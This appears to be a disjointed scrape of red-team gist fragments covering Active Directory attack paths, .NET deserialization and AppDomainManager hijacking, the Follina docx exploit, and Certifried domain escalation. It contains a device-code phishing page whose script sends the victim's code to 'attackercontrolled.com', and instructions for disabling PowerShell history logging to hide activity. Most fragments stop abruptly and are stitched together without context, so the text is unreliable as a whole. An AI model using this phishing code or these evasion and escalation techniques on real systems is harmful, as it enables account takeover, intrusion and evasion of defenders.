MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup
function Get-DirectoryContent { | |
<# | |
.SYNOPSIS | |
Function to get directory content | |
.EXAMPLE | |
Get-DirectoryContent -Path "C:\" -HeaderName "poshserver.net" -RequestURL "http://poshserver.net" -SubfolderName "/" | |
//All credit goes to Ysoserial.net and the great @tiraniddo | |
//Snippets copied from ysoserial.net | |
//https://thewover.github.io/Mixed-Assemblies/ - Great read! | |
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read | |
using System; | |
using System.Collections.Generic; | |
using System.Runtime.Serialization.Formatters.Binary; | |
using System.IO; | |
using System.Reflection; |
Logs are held by default in the user profile: | |
\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt | |
this directory also hosts per-application logs | |
-------------------------------------------------------------- | |
Disable Logging... | |
remove-module psreadline |
import smtplib | |
from email.mime.text import MIMEText | |
from email.mime.multipart import MIMEMultipart | |
from email.mime.text import MIMEText | |
from email.mime.base import MIMEBase | |
from email import encoders | |
import ssl | |
import email | |
import argparse |
# Upload | |
&{ | |
$ErrorActionPreference = 'Stop' | |
$AWSRegion = "us-east-1" | |
$AWSAccessKeyId = "TODO: Access Key" | |
$AWSSecretAccessKey = "TODO: Secret Access Key" | |
$BucketName = "TODO: Bucket Name" | |
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null | |
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog | |
$OpenFileDialog.ShowDialog() | Out-Null |
<!-- This page can be formatted to look like something more interesting --> | |
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> | |
<script> | |
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) { | |
$.get("https://attackercontrolled.com/?id=" + data.device_code); | |
document.write(data.message); | |
}); | |
</script> |
MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup
using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
public sealed class MyAppDomainManager : AppDomainManager | |
{ | |
public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
{ |
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites: